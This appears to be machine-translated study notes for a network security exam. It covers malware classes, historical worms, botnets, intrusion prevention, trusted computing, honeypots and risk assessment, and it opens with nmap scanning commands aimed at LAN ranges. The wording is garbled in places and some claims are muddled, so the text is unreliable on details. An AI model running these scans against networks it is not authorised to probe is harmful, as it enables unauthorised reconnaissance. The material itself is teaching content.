nmap -sU 192.168.1.0/24 /UDP Scan LAN
nmap -sU 192.168.1.1-20 /UDP scan LAN and specify the range
nmap -sP 192.168.1.1-20 /icmp scan
nmap -sS -p 192.168.1.1 /Scan port
nmap -sC -sV -O 192.168.1.3 / Check the target operating system type
5. Virtual patching is to protect objects that have not been patched. Use other devices to perform network traffic filtering vulnerability attacks on the vulnerable object device, thereby ensuring that the protected object can be protected without being patched. , such as intrusion blocking, web firewall and other technologies.
6. There are six steps in network security vulnerability patching:
status analysis, patch tracking, patch verification, patch installation, emergency response, and patch inspection.
- The main sources of non-technical security vulnerabilities
(1) The person responsible for network security is not clear.
(2) The network security strategy is incomplete.
(3) Insufficient network security operation skills.
(4) Lack of network security supervision.
(5) Incomplete network security privilege control. - The main source of technical security vulnerabilities
(1) Design Error.
(2) Input Validation Error.
(3) Buffer Overflow.
(4) Exceptional Condition Handling Error.
(5) Access Validation Error.
(6) Configuration Error.
(7) Competition conditions (Race Cond Mountain).
(8) Condition Error.
Web application vulnerability checking function.
Ability to detect SQL injection, cross-site scripting, website Trojans, web Trojans, CGI vulnerabilities, etc.
Common products are in the form of IPS (Intrusion Prevention System), Web Firewall (WAF), Unified Threat Management (UTM), etc.
Unified threat management (UTM for short) usually integrates functional modules related to intrusion detection systems and is
one of the manifestations of intrusion detection technology products. Unified threat management is a specialized device composed of hardware, software and network technology. The device mainly provides one or more security functions and integrates multiple security features into one hardware device to form a standard unified threat. Management platform. It integrates multiple security functions through unified deployment of security policies, and is a gateway device or system that comprehensively defends against security threats to networks and application systems. UTM is usually deployed at the boundary between the internal network and the external network to protect and control data flowing out of and into the internal network. How UTM is deployed in real networks usually includes transparent bridges, route forwarding, and NAT gateways.
Advanced Persistent Threat (APT) is a sophisticated attack technology that usually embeds malicious code in Word documents, Excel
documents, PPT documents, PDF documents or emails to achieve more covert network attacks and evade common network security checks. . For example, the Donot organization has a decoy vulnerability document named after the "Kashmir Issue", which exploits the CVE-2017-8570 vulnerability. Its main attack process is shown in Figure 10-9.
The advanced persistent threat detection system is a special form of intrusion detection technology product. Its product technology principle is based on static/dynamic analysis to detect suspicious malicious electronic files and correlation analysis of network security big data to discover advanced persistent threat activities.
Network security vulnerability exploitation prevention technology
1. Address space randomization technology - by randomizing the memory address where the program is loaded, so that the attacker
cannot determine the return address of the program in advance
2. Data execution prevention - the operating system controls specific The memory area is marked for execution, so that the code cannot
run in the specified memory area .
3. SEHOP – Prevent attackers from using SHE to rewrite.
4. Stack protection – Set the stack integrity flag to check whether the function call return address has been tampered with, thereby preventing
Prevent attackers from exploiting buffer vulnerabilities
5. Virtual patches
The full name of SEHOP is Structured Exception Handler Overwrite Protection. SEH attack refers to using carefully constructed data to overwrite a node or multiple nodes on the structured exception handling list through stack overflow or other vulnerabilities. Thus controlling EIP (controlling program execution flow). SEHOP is a security protection solution proposed by Microsoft against this kind of attack.
Fourteen (Key Points): Malicious code types include (only worms spread actively, others are passive):
viruses, worms, Trojan horses, logic bombs, bacteria, malicious scripts, malicious ActiveX controls, and spyware.
Malicious code survival technologies include: anti-tracking technology, encryption technology, fuzzy transformation technology, deformation technology, automatic production technology, three-thread technology, process injection technology, and communication hiding technology.
Channel hiding technology backdoors include: bo2k, code red 2, Nimuda cover, tcp
glacier, uses port 7626, backorifice uses port 54320,
executor uses port 80 to transfer control information and data,
ftp trojan wincrash uses port 21 to transfer
winpc, and winspy Trojan uses port 25.
Malicious code detection: rootkit, clam AV
file security check: md5sum tripwire
Rootkits are typical Trojan horses with hidden capabilities. Currently, there are three types of techniques for detecting Rootkits, which are described
as follows:
The first type is to detect known Rootkits. This method uses the running trace characteristics of Rootkits to determine
whether there are Trojans in the computer system. The main disadvantage of this method is that it can only target specific known rootkits, and it
is almost powerless against unknown rootkits.
The second category is analysis and detection methods based on execution paths.
The third category is the analysis and detection method that directly reads the kernel data. This method is aimed at
hiding one's own root by modifying the kernel data structure. The basic principle is to directly read the internal data in the kernel to determine the current status of the system. .
Logic Bombs enter Bacteria, Malicious Scripts, and malicious ActiveX controls and Spyware
Malicious code definition
: Malicious code in English is a program code that violates the security policy of the target system. It can cause information leakage, resource abuse, and damage to the integrity and availability of the system.
Malicious code attack technology: process injection technology, super management technology, port reverse link technology, buffer overflow attack technology
Common attack techniques:
port scanning, password cracking, buffer overflow, malicious code, denial of service, phishing, network eavesdropping, SQL injection, social engineering, electronic monitoring, reply hijacking, vulnerability scanning, proxy technology, and data encryption.
Trojan horse prevention technology:
Trojan horse detection technology based on viewing open ports
Trojan horse detection technology based on important system files
Trojan horse detection technology based on registry
Detection of Trojan horse technology with hidden capabilities Network-based detection of Trojan horse technology Network-based
detection technology
Blocking Trojan Horse Techniques
Trojan Horse Removal Techniques
Network worm prevention technology
Network worm monitoring and early warning technology - installation of detectors
Network worm propagation suppression technology - honeypots
Network system vulnerability detection and system reinforcement technology
Network worm immunity technology – deception
Network worm blocking and isolation technology -- Routers, firewalls
Network worm removal technology – delete files, registries, and processes
2. Six steps of malicious code behavior:
Intrude, elevate privileges, conceal, lurk, sabotage, repeat the above actions.
3. To protect the malicious code itself, use anti-tracking technology (anti-dynamic tracking and anti-static tracking) to improve its camouflage and anti-cracking capabilities.
3. Two methods of malicious code analysis:
static analysis: anti-malware code software inspection, string analysis, and static decompilation analysis.
Dynamic analysis: file monitoring, process monitoring, registry monitoring, dynamic disassembly analysis.
Characteristics of malicious w code: concealment, contagiousness, and latent nature
4. Computer viruses have four characteristics: concealment, contagiousness, latent nature and destructiveness.
Computer virus life cycle:
latent stage, propagation stage, trigger stage, attack stage
5. Computer viruses consist of three parts: replicating infectious components, hidden components, and destructive components.
Virus life cycle stages: replication and propagation stage, activation and execution stage
Three technical methods to defend against unknown viruses: active defense, cloud scanning, and AI scanning.
6. Trojan attack steps: find the target, collect target information, implant the Trojan, hide the Trojan, and realize the intention.
A network worm is a malicious program that has the ability to replicate and propagate itself, and can run independently and automatically.
According to the way network worms discover susceptible hosts, network worm propagation methods can be divided into three categories: random scanning
, sequential scanning, and selective scanning.
7. The worm has four functional modules:
detection module: detects the vulnerability of the target host
; propagation module: generates copies of the worm and transmits them between different hosts.
Worm engine module: uses algorithms to collect information from the target host.
Payload module: Pseudocode implemented inside the worm.
Worm propagation method: random scanning, sequential scanning, selective scanning
"Slammer" The worm's propagation method is to use random scanning to infect the host.
"W32.Blaster" is a typical sequential scanning worm.
Ransomware attributes worm class
8. The worm runs in three stages:
searching for other infected hosts on the host that has been infected with the worm.
Send the worm code to other infected hosts using ftp, tftp, share, etc.
After the infected target code is successfully uploaded, continue to perform the first step, the second step, and so on.
In current network and distributed system security, more than 50% of widely exploited buffer overflows are buffer overflows. The most famous example is the worm that exploited the fingerd vulnerability in 1988. Among buffer overflows, the most dangerous one is stack overflow, because an intruder can use stack overflow to change the address of the return program when the function returns, allowing it to jump to any address. One of the hazards is that the program crashes and causes rejection. service, the other is to jump and execute a piece of malicious code, such as getting a shell, and then do whatever you want
9. SQL Slammer (2003) Slammer is a DDOS malicious program that uses random scanning methods. It uses a new infection method to infect servers with distributed denial of service attacks. It exploits the weaknesses of SQL Server to conduct denial of service attacks. 1434 port and infects SQL Server in the memory. Through the infected SQL Server, it spreads a large number of denial of service attacks and infections, causing SQL Server to be unable to operate normally or crash, causing internal network congestion. Like Code Red, it simply resides in the memory of the compromised server.
Since the SQL Slammer outbreak occurred on a Saturday, the monetary damage caused by the damage was not large. Despite this, it still impacted about 500,000 servers around the world and once paralyzed South Korea's network for 12 hours.
SQL Slammer, also known as "Sapphire", first appeared on January 25, 2003. It is an unusual worm that has had a significant negative impact on Internet traffic. Interestingly, its target is not end computer users, but servers. It is a single-packet, 376-byte worm that randomly generates IP addresses and sends itself to these IP addresses. If an IP address happens to be a computer running an unpatched version of Microsoft's SQL Server Desktop Engine software, it will also quickly start firing viruses at random IP addresses.
10. W32.Blaster.Worm is a worm virus that is scanned in sequence and uses the DCOM RPC vulnerability to propagate. It has a strong propagation ability. For detailed description, please refer to Microsoft Security Bulletin MS03-026. Infection with worms may cause system instability and may cause system crashes. The port number it scans is TCP/135. After successful transmission, it will use tcp/4444 and UDP 69 ports to download and run it. The code program Msblast.exe. This worm will also perform a denial of service attack on windowsupdate.com.
11. Code Red: The "Code Red" virus is a network worm discovered on July 15, 2001 that infects computers running the Microsoft IIS Web server. The technology used in its spread can fully reflect the ingenious combination of network security and viruses in the Internet era. It integrates network worms, computer viruses, and Trojan horse programs, creating a new way for network virus spread, which can be called an epoch-making virus. If slightly modified, it will be a very deadly virus. It can completely obtain all the permissions of the compromised computer and do whatever it wants. It can steal confidential data and seriously threaten network security.
The "Code Red" worm uses a hacker technology called "buffer overflow" and exploits the vulnerability of Microsoft IIS [3] to infect and spread the virus. The virus uses the HTTP protocol to send a GET request containing a large number of garbled characters to port 80 of the IIS server. The purpose is to cause the system buffer area to overflow, obtain super user privileges, and then continue to use HTTP to send the ROOT.EXE Trojan program to the system, and Running on this system allows the virus to reside in the system's memory and continue to infect other IIS systems. When Code Red sends GET garbled code to the victim, it always adds a file name with the suffix .ida before the garbled code, indicating that it is requesting the file. This is an important feature of Code Red.
12. Chinese hackers (using three-thread technology): This virus is a worm. Executable files will not be infected.
During the activation process, the virus will copy the virus itself to the Windows system directory. Copy itself to windows\system\runouce.exe on Windows 9x systems and
copy itself to winnt\system32\runouce.exe on Windows 2000 and Windows NT systems. Then run the program. And add it to the registry as self-starting. Causes the virus to be activated every time the computer is turned on.
This virus is transmitted through emails and has a self-starting function. It will start automatically as long as it is clicked in Outlook. The virus copies itself to the Windows\system 32 directory, names it Runouce.exe, and starts this file at the same time. After startup, the virus creates two threads. In addition to ordinary threads, there is also a kernel thread. This kernel thread tracks and monitors its own ordinary thread. Once an ordinary thread is killed, it will immediately restart and create a new ordinary thread. Therefore, ordinary anti-virus software cannot completely kill it.
At the same time, this virus uses local area networks very effectively to spread. Once it enters a machine on the LAN, it will immediately search for shared folders in "My Network Places". As long as a writable shared folder is searched, an .eml file starting with the name of the infected machine will be generated, so in the end all machines on the LAN will become the "sending base" for virus emails.
6. Three-thread technology
Three-thread technology is used in malicious code to prevent the malicious code from being stopped by external operations.
The working principle of three-thread technology
is that a malicious code process opens three threads at the same time, one of which is the main thread responsible for remote control work, and the other two are monitoring threads responsible for checking whether the malicious code program has been deleted or stopped from starting. Monitoring threads and daemon threads. Inject daemon threads in other executable files to synchronize with the malicious code process. As soon as the process is stopped, it restarts the process while providing the necessary data to the main thread, thus allowing the malicious code to continue running. "Chinese hackers" are malicious codes that use this technique.
13. Morris Worm: Its author is Robert Morris, a first-year graduate student at Cornell University in the United States. This program only has 99 lines. It takes advantage of the shortcomings of the Unix system. It uses the Finger command to check the list of online users, then deciphers the user password, uses the Mail system to copy and spread its own source program, and then compiles and generates code. The original network worm was designed to "wander" between computers when the network is idle without causing any damage. When a machine is overloaded, the program can "borrow resources" from idle computers to achieve load balancing on the network. The Morris worm does not "borrow resources" but "exhausts all resources." It was the first worm to spread over the Internet.
14. Botnet: Botnet refers to the use of one or more means of propagation. Attackers spread and infect a large number of hosts with bot program (bot program) viruses through various channels, and the infected hosts will receive the attack through a control channel. The attacker's instructions form a botnet. This botnet is then used to attack other targets, usually using honeypot technology for defense.
The main construction methods of botnets include remote vulnerability attacks, weak password scanning intrusions, email attachments, malicious documents, file
sharing, etc. Early IRC botnets were mainly constructed using worm-like active scanning combined with remote vulnerability attacks. Currently, attackers construct botnets by means of web page Trojans (such as ve-by download).
The operating mechanism of the botnet mainly consists of three basic links.
The first step is the spread of bots. By exploiting computer network system vulnerabilities, social engineering, criminal toolkits, etc., the bots are spread to computers on the target network.
The second step is to perform remote command operations and control on the zombie program and form a network of victimized target machines. Botnets can be divided into centralized and distributed. The communication protocols between the bot and the control end include IRC and HTTP.
In the third step, the attacker sends attack instructions to the bot program through the botnet's control server and performs attack activities, such as sending spam emails, DDoS attacks, etc.
In order to protect its own security, the botnet uses an encryption mechanism for communication between the control server and the bot program, and embeds the communication content into normal HTTP traffic to protect the concealment and anonymity of the server. Control servers and bots also use authentication mechanisms to prevent control message forgery and tampering.
Botnet defense methods:
- Botnet threat monitoring
usually uses honeypot technology to obtain botnet threat information, deploy multiple honeypots to capture spreading bots (Bots),
record the Bot's network behavior, and then manually analyze network logs and combine them with sample analysis results to Master the properties of the Bot, including the server it is connected to (DNS/IP), port, channel, password, control password and other information, thereby obtaining basic information and even control of the botnet. - Botnet detection
detects abnormal network traffic in the network based on the communication content and behavioral characteristics of the botnet to discover botnets. - Active containment of botnets
blocks malicious IP addresses or domain names through routing and DNS blacklists. - Botware detection and killing
: Install special security tools on the victimized target machine to eliminate zombie programs.
15. Logic bomb: malicious code attached to software.
16. Trapdoor: A maintenance backdoor left by equipment developers for the convenience of maintenance.
Trapdoors do not have automatic propagation and self-replication functions.
17. Bacteria: Programs with the ability to replicate.
18. Malicious code monitoring: IDS, network security analyzer.
The most effective defense against malicious code is patching.
19. APT: Advanced persistent threat: uses email to attack target hosts.
Advanced persistent threats (APTs) often use email as a target system. An attacker
embeds malicious code in an email and sends it to a target group, tricking the recipient into opening a malicious electronic document or clicking
a link to a malicious site. Once the recipient submits, the malicious code will be installed on the recipient's computer, thereby remotely
controlling the recipient's computer, and then gradually infiltrating the recipient's network to achieve its attack intent.
In response to the characteristics of advanced persistent threat attacks, deploy an APT detection system to detect the
presence of malicious code in electronic documents and emails to prevent attackers from penetrating and invading the network through emails and electronic documents.
Overall protection includes four aspects: operation support, attack prevention, security monitoring, and emergency response.
Anti-tracking technology can be roughly divided into two categories: anti-dynamic tracking technology and anti-static analysis technology.
l) Anti-dynamic tracking technology
• Disable tracking interruption.
• Detection and tracking method.
• Such as instruction flow queue method
• reverse instruction flow method, etc.
2) Anti-static analysis technology
• Block-encrypted execution of program code.
• Directive method.
There are three encryption methods, namely information encryption, data encryption and program code encryption.
Cascade is the first example of malicious code in a DOS environment that uses encryption technology. Its decryptor is stable and can decrypt the encrypted program body in memory. Mad and Zombie are extensions of Cascade encryption technology, extending malicious code encryption technology to 32-bit operating system platforms. In addition, "China bomb" and "ghost virus" are also malicious codes of this type.
Process injection technology uses these service-related executable codes embedded with malicious code programs as a carrier to hide and launch itself. This type of malicious code only needs to be installed once before it can be loaded into the system by the service and run, and it can remain active all the time.
"Guangwai Girls" is a domestic Trojan horse that uses super management technology to carry out denial-of-service attacks on "Kingsoft Drug Tyrant" and "Skynet Firewall".
The malicious code is instructed to use port reverse connection technology to make the attacking server (controlled end) actively connect to the client
(control end) port. The earliest Trojan program to implement this technology is the foreign "Boinet", which can contact the client through four methods: ICO, IRC, HTTP and reverse active connection.
"Network Thief" is my country's earliest malicious code that implements port reverse connection technology. "Gray Pigeon" is the master of this technology. It has built-in three server-side online notification functions: FTP, domain name, and server-side active connection.
Static analysis of malicious code mainly includes the following methods:
(1) Detection and analysis of anti-malware code software.
(2) String analysis
(3) Script analysis
(4) Static decompilation analysis
(5) Static disassembly analysis
Dynamic analysis of malicious code mainly includes the following methods:
1. File monitoring
2. Process monitoring
3. Network activity monitoring
4. Registry monitoring
5. Dynamic decompilation analysis
15. IPS and SPS functions (sps refers to bypass ips):
block specified IP addresses, block specified ports, block specified domain names, and provide hot patches for zero-day vulnerabilities.
The basic working principle of IPS is to control packet forwarding by judging attack behaviors based on the characteristics and context of network packets. Its working mechanism is similar to that of a router or firewall, but IPS can detect attack behaviors and block intrusion behaviors. IPS should
Intrusion blocking is a technical method of active network security defense. Its basic principle is to
protect the target object by blocking the network attack behavior of the target object.
The main security functions of IPS/SPS are as follows:
•Block specified IP addresses;
•Block specified network ports;
•Block specified domain names;
•Block command URLs and block specific attack types;
•Provide heat for Zero-day Vulnerabilities patch
Hot patch: Hot patch, also known as patch, refers to some code that can repair software vulnerabilities. It is a quick and low-cost way to repair defects in product software versions. Notify users of hot patches via email or other channels. Generally, patches can be downloaded for free from the software vendor's website. Compared with upgrading the software version, the main advantage of hot patching is that it will not interrupt the currently running services of the device. That is, the defects of the current software version of the device can be repaired without restarting the device.
The China Anti-Network Virus Alliance (ANYA) hosted and built a network security threat information sharing platform to facilitate enterprises to share
threat information
. The China Anti-Network Virus Alliance (ANVA) took the lead in the construction. Focusing on the three key aspects of App development, dissemination and terminal protection, guide App developers, mobile application stores and terminal security software to carry out self-discipline work to provide netizens with a safe App usage environment and avoid infection with mobile malicious programs
The mobile Internet whitelist application review process has the following three links:
• Initial review. The "Whitelist Working Group" composed of 11 mobile Internet security companies independently conducts
full security inspections on the App.
• Review. The member units of the "White List Working Group" will negotiate and vote through offline meetings based on the results of the "preliminary review"
.
. Final Judgment. ANVA will comprehensively determine whether it has passed the "white list" certification based on the results of the "preliminary review", the results of the "reexamination" and the applicant's clarification.
The release process of the mobile Internet application self-discipline list has two stages: publicity and release. During the publicity
stage, ANVA releases the "white list" certification results to the public. The publicity period is 7 working days, during which it receives public reports. For Apps that have passed the publicity stage, ANVA will hold a "Whitelist Conference" and issue certificates to the "Whitelist Apps" on-site. At the same time, the App Stores in the "App Store Self-Discipline Group" will be required to communicate in their own App Store Web sites and App clients. List App provides eye-catching reminders.
2. Network traffic cleaning: (traffic detection-traffic cleaning and traction-traffic reinjection)
Traffic detection: using DPI Shenzhen data packet monitoring technology.
Traffic cleaning and traction: When a network attack is detected, BGP or DNS is used to index data packets to the cleaning center.
Traffic back-injection: It is the cleaned normal network data traffic sent to the target host.
DPI technology adds analysis to the application layer based on packet header analysis, and is based on application layer traffic detection and control technology.
2. What are the network traffic cleaning applications:
malformed packet filtering, anti-denial of service attack, WEB application protection, DDOS high-defense IP service.
Common denial-of-service traffic includes SYN Flood, UDP Flood, ICMP Flood, DNS Query Flood, HTTP Get Flood, CC attacks and other network attacks flow.
The technical principle of trusted computing is to first build a root of trust, and then establish a chain of trust, starting from the root of trust to the hardware
platform, to the operating system, and then to the application, with one level of certification and one level of trust. Trust extends to the entire computer system, thereby ensuring the trustworthiness of the entire computer system. A trusted computer system consists of a trusted root, a trusted hardware platform, a trusted operating system and a trusted application system.
3. Components of a trusted computer system:
Trusted root - Trusted hardware platform - Trusted operating system - Trusted application system
The security chip (TPM) is an integrity measurement mechanism for the root of trust, which enables
the integrity of components to be identified when the computing system platform is running and prevents tampering with the operation of computing components.
TPM is the root of trust of the trusted computing platform and a key component of trusted computing.
TCG defines the root of trust of the trusted computing platform to include three roots:
Trusted Metric Root RTM,
Trusted Storage Root RTS
Trusted Report Root RTR.
Among them, the trusted measurement root RTM is a software module; the trusted storage root RTS is composed of the trusted platform module TPM chip and the storage root key SRK; the trusted reporting root RTR is composed of the trusted platform module TPM chip and the root key EK .
Trusted computing is the core key technology of network information security. China has established an independent trusted computing standard system with TCM as the core based on independent cryptographic algorithms
. The platform is mainly composed of two parts: the Trusted Cryptographic Module (TCM) and the TCM Service Module (TSM). Among them, the Trusted Cryptographic Module (TCM) is a key basic component necessary for the trusted computing cryptographic support platform, providing independent cryptographic Algorithm support. TCM is a collection of hardware and firmware. It can be in an independent package form, or it can be integrated with other types of chips in the form of IP core to provide TCM functions.
Trusted computing computing application
Computing platform security protection – integrity measurement and inspection to prevent malicious code from tampering with BIOS, operating system and
application software
Trusted network connection - - identity authentication, integrity authentication
Trusted verification
4. Trusted computing platform application:
The trusted network connects to the TNC, uses TPM/TCM security chips to perform integrity measurement checks on key computer components, prevents tampering with bios, operating systems, and application software, and solves terminal security status authentication and post-access control .
Trusted Network Connect (TNC) uses TPM/TCM security chips to implement platform identity authentication and integrity verification, thereby solving the terminal's security status authentication and post-access control issues.
The TNC structure is divided into:
Integrity measurement layer: responsible for collecting and verifying complete information with AR.
Integrity evaluation layer: evaluating the integrity status of AR based on security policies.
Network access layer: security policy enforcement, access authorization.
TPM is the root of trust of the trusted computing platform and an important component of trusted computing.
TCG defines the trusted computing platform root of trust to include:
Trusted measurement root RTM: It is a software module
Trusted storage root RTS: Trusted platform module TPM chip, storage root key SRK
Trusted reporting root RTR: Trusted platform simulation TPM chip , trusted key EK
The principle of digital watermarking is
to embed specific marks in digital media files through digital signal processing methods. Watermarks are divided into two types: perceptible and imperceptible.
5. Digital watermarks are divided into perceptible watermarks and imperceptible watermarks.
Watermark embedding methods: spatial domain method, transformation domain method.
6. Watermark application scenarios:
copyright protection, information hiding, information traceability, and access control.
Copyright digital watermark requirements include: concealment, security, and robustness.
Robustness: The watermark added to the image must be able to apply transformation operations and will not be lost due to transformation processing.
Robust attacks: pixel distortion attack, sensitivity analysis attack, gradient descent attack.
There are four types of watermark attacks: robust attacks, expressive attacks, interpretive attacks, and legal attacks. The first three are technical attacks
7. Network trap technologies (network deception) include: honeypot host technology and trap network technology.
Honeypot technology: empty system (standard host, running operating system and applications), mirror system, virtual system (running multiple virtual machines in virtual machine software, virtual machines installing different operating systems, special software honeyd)
8. Network attack trap technology consists of: multiple honeypot hosts, routers, firewalls, IDS, and audit systems. Create an attack environment for the attacker for the defender to study the attacker's attack behavior. Trap networks generally need to implement functions such as honeypot systems, data control systems, data capture systems, data recording, data analysis, and data management.
Honeypot systems do not directly improve security levels.
Application of network attack trap technology:
Malicious code monitoring: Analyze the network traffic of honeypot nodes and the number of malicious codes in the system to discover advanced malicious codes.
Enhance anti-attack capabilities: Use network attack traps to interfere with attack activities with false targets to delay network attacks.
Network situational awareness: Use big data for analysis to obtain attack behavior characteristics and sources.
In the first generation of trap networks, data packets entering and leaving the trap network pass through firewalls and routers. The function of the firewall is to control the communication connections between internal and external networks and prevent the trap network from being used as a springboard to attack other systems. Its rules are generally configured not to restrict external network access to the trap network, but it is necessary to strengthen control over the external connections of the honeypot host in the trap network, including: restricting the destination of external connections, restricting active external connections, restricting the protocol types of external connections, etc. The router is placed between the firewall and the trap network. The router can hide the firewall. Even if the attacker controls the honeypot host in the trap network and finds that the router is connected to the external network, it can be discovered by the firewall. At the same time, the router has access control functions that can make up for the shortcomings of the firewall, such as preventing address spoofing attacks, DoS, and ICMP-based attacks. The data capture device of a trap network is an IDS, which monitors and records communication connections in the network and alerts suspicious network activities. In addition, in order to understand the attacker's behavior in the honeypot host, we must try to obtain system activity records. There are two methods: first, let all system logs not only be recorded locally, but also sent to a remote log server; second, It is to install monitoring software to record keystrokes, screen copies, system call records, etc., and then transmit them to the remote host.
The second generation trap network technology realizes the integrated system of data control system and data capture system, which makes installation
and management easier, as shown in Figure 15-17. Its advantages include:
first, it can monitor unauthorized activities;
second, it is more concealed;
third, it can use active response methods to limit the effects of illegal activities, such as modifying the attack code bytes to make the attack ineffective.
Currently, researchers are developing virtual honeynets, which integrate
the functions into a physical device to implement honeypot systems, data control systems, data capture systems, data recording and other functions. We Call it the third generation of trap network technology,
open source network attack trap systems include Honeyd, industrial control system honeypot Conpot, password honeypot Honeywords, etc.
Situation awareness: Combining anti-virus software, firewalls, intrusion detection systems, and security audits to evaluate the entire network situation and predict future trends.
Four parts: data collection, feature extraction, situation assessment, and security warning.
Contents: 1. Perceiving network assets 2 , Perceive asset vulnerability 3, Perceive security events 4, Perceive network threats 5, Perceive
network attacks 6, Perceive security risks
9. Intrusion tolerance 3R strategy: resistance, recognition, and recovery.
The concept of Security 1.0 is to keep intruders out of the protected system, the concept of Security 2.0 is to detect network security threats, prevent network security threats, and achieve network security isolation, while the concept of Security 3.0 is to tolerate intrusions, respond to network security threats, and eliminate victims. of systems are recoverable
The blockchain is composed of many peer nodes, using consensus mechanisms and cryptographic algorithms to maintain the integrity and consistency of block data and transactions, forming a unified distributed ledger. Blockchain is a decentralized distributed database, and data security has strong intrusion tolerance.
10. Privacy protection types can be divided into:
Identity privacy: the user’s true identity information.
Attribute privacy: personal attribute characteristics such as age, gender, and salary.
Social relationship privacy: social information that users are unwilling to disclose.
Location track privacy: activity track information.
From the perspective of data mining, privacy protection technologies can be divided into:
based on data distortion, based on data encryption, and based on data anonymization.
Privacy protection method:
K Anonymous: All metadata is generalized, and the data no longer corresponds to anyone one-to-one.
Differential privacy method: Add random noise to the private data so that the attacker cannot deduce the real information.
Currently, common technical measures for privacy protection include suppression, generalization, replacement, perturbation, and clipping.
Among them, suppression is to limit data release by leaving data blank;
generalization is to provide anonymity by reducing data accuracy;
replacement method is to change the owner of the data;
perturbation is to add a certain amount of noise when releasing data, including data addition and deletion. , transformation, etc., so that the attacker cannot distinguish between real data and noise data, thus causing interference to the attacker;
tailoring is to release sensitive data separately.
In addition, cryptography technology is also used to achieve privacy protection. Use encryption technology to prevent unauthorized access and misuse of private data by illegal users.
11. Common personal information application protection scenarios:
Anonymize personal information: use asterisks to represent ID card names and ID numbers.
De-identify personal information: use pseudonyms or hash functions.
12. Common risks of domain names:
domain name hijacking,
domain name information tampering,
domain name resolution configuration errors,
domain name software security vulnerabilities
16. Network security risk refers to the vulnerability of the network.
1. Three network risk assessment models: self-assessment, inspection assessment, and entrusted assessment
Risk elements
Basic elements: assets, vulnerabilities, threats, risks, security measures.
Four processes of risk assessment:
risk assessment preparation, risk factor identification, risk degree analysis and risk level evaluation
Risk assessment does not belong to the information security risk assessment and identification stage
Assuming that the probability of a website being attacked by a hacker is 0.8 and the economic impact is RMB 20,000, the company's website security risk
quantification value is RMB 16,000.
Measured based on three basic security attributes of assets, namely confidentiality, integrity and availability
2. Vulnerability assessment takes assets as the core. Vulnerability assessment is divided into two types:
technical vulnerability assessment and management vulnerability assessment.
3. Network security analysis steps:
1. Identify assets and determine value.
2. Threat identification and planning the frequency of threats.
3. Vulnerability identification, assigning values to serious programs with vulnerabilities.
4. Difficult procedures to determine the probability of occurrence based on threats and vulnerabilities
5. Assessment of asset loss value based on threats and vulnerabilities.
6. Calculate the impact on the organization after a security incident occurs, which is the network security risk value.
4. The national information risk assessment standard divides the confidentiality, integrity and availability of assets into five levels. The higher the level, the more important the asset is.
5. Five levels of asset availability for value estimation:
1 Very low: Normal availability is less than %25
2 Low: Normal availability is more than 25%, or system interruption is less than 60 minutes
3 Medium: Normal availability is more than 70%, or system interruption is less than 30 minutes
4 High: Normal availability is more than 90% per day, or system interruption is less than 10 minutes.
5 Very High: Normal availability is more than 99.9% per year, and the system does not allow interruption.
Value estimation is not the physical actual economic value of the asset, but the relative value, which is generally measured based on the three basic security attributes of the asset, namely confidentiality, integrity and availability. The result of the value estimation is determined by the impact on the asset itself and its related businesses when the asset's safety attributes are not met. Currently, the national information risk assessment standards divide the confidentiality, integrity and availability of assets into five levels. The higher the level, the more important the asset is.
6. Threat sources can generally be divided into natural threats and man-made threats according to their nature. Natural threats include lightning, floods, earthquakes, fires, etc., while man-made threats include theft, destruction, cyber attacks, etc. Threat effects are abstracted into three types: illegal access, deception, and denial of service. Depending on the identity of the threat actor, threat intent can be divided into challenge, intelligence information acquisition, terrorism, financial gain, and retaliation.
Threat frequency is assigned five levels:
1 Very Low: The threat is almost impossible to occur.
2 Low: The frequency is small and unlikely to occur.
3 Medium: Threat is more than once in half a year
4 High: Threat is more than once a month
5 Very High: Threat is more than once a week
The following is a comparison table of threat possibility assignments.
Generally speaking, vulnerability identification takes assets as the core.
Technical vulnerability assessment: Management vulnerability assessment is mainly conducted from the rationality and effectiveness of existing security technical measures.
Management vulnerability assessment: Analyze and evaluate existing security vulnerabilities from the perspective of network information security management, and identify their severity.
Cybersecurity risk analysis: refers to the comprehensive use of qualitative and quantitative analysis methods on the basis of asset assessment, threat assessment, vulnerability assessment, security management assessment, and security impact assessment to select appropriate risk calculation methods or tools to determine the size of the risk. and risk level.
There are two methods for calculating network security risks: multiplication method and matrix method.
Multiplication method: possibility of security incident X loss caused by security incident = risk value.
Matrix method: two-dimensional matrix to identify the possibility and correlation of security events.
Multiplication example:
Vulnerability severity
Vulnerability
severity
_
7. Network security analysis methods mainly include: qualitative analysis, quantitative analysis, and combination of qualitative and quantitative analysis.
1. Qualitative calculation method: It is to subjectively evaluate the relevant attributes of assets, threats, vulnerabilities and other elements in risk assessment, and then provide the risk calculation results.
2. Quantitative calculation method: assets, threats, vulnerabilities, etc. are quantified into data, and then risks are quantitatively calculated, usually presented in terms of economic losses, scope of impact, etc. However, in fact, it is difficult to accurately quantify the losses of assets, threats, vulnerabilities, and security incidents using data, so a complete quantitative calculation method is not feasible. The output of quantitative calculation methods is a risk value.
3. Comprehensive calculation method: Combining qualitative and quantitative methods, quantitatively assign values to various elements of risk assessment such as assets, threats, vulnerabilities, and security incident losses, and then select appropriate calculation methods for risk calculation.
8. Security risk management control measures:
Develop clear security policies,
establish security organizations,
carry out asset classification control,
strengthen personnel security management,
ensure the safety of physical entities and environments,
strengthen secure communication security,
adopt access control mechanisms,
develop and maintain security systems,
ensure continuous business operation,
and comply with laws and regulations.
9. Before the network security risk assessment, a confidentiality agreement must be signed, sensitive systems must be tested, at least 2 people must participate in the assessment, and the leader must sign for confirmation.
OWASP risk assessment method reference. OWASP is an organization for WEB application security. The risk assessment is divided into: 0-3 low, 3-6 medium, and 6-9 high.
OWASP is a research organization for Web application security. The OWASP risk assessment method recommended by it is divided into
the following steps:
Step 1, determine the risk category;
Step 2, assess the possible factors; Step 3
, assess the influencing factors;
Step 4, determine the risk Severity
Step 5: Decide what to fix
Step 6: Customize an appropriate risk rating model
Web page anti-tampering methods: time polling, core embedding, file filtering driver
The main objectives of ICT supply chain risk management are as follows:
• Integrity. Ensure that in all aspects of the ICT supply chain, products, systems, services and the components, parts, components, data, etc. contained therein
are not implanted, tampered with, replaced or counterfeited.
• Confidentiality. Ensure that information passed along the ICT supply chain is not leaked to unauthorized parties.
• Availability. Ensure that demanders' access to the ICT supply chain is not unreasonably denied.
• Controllability. Controllability refers to the demander's ability to control ICT products, services or supply chains. The ICT supply chain mainly faces five types of security threats:
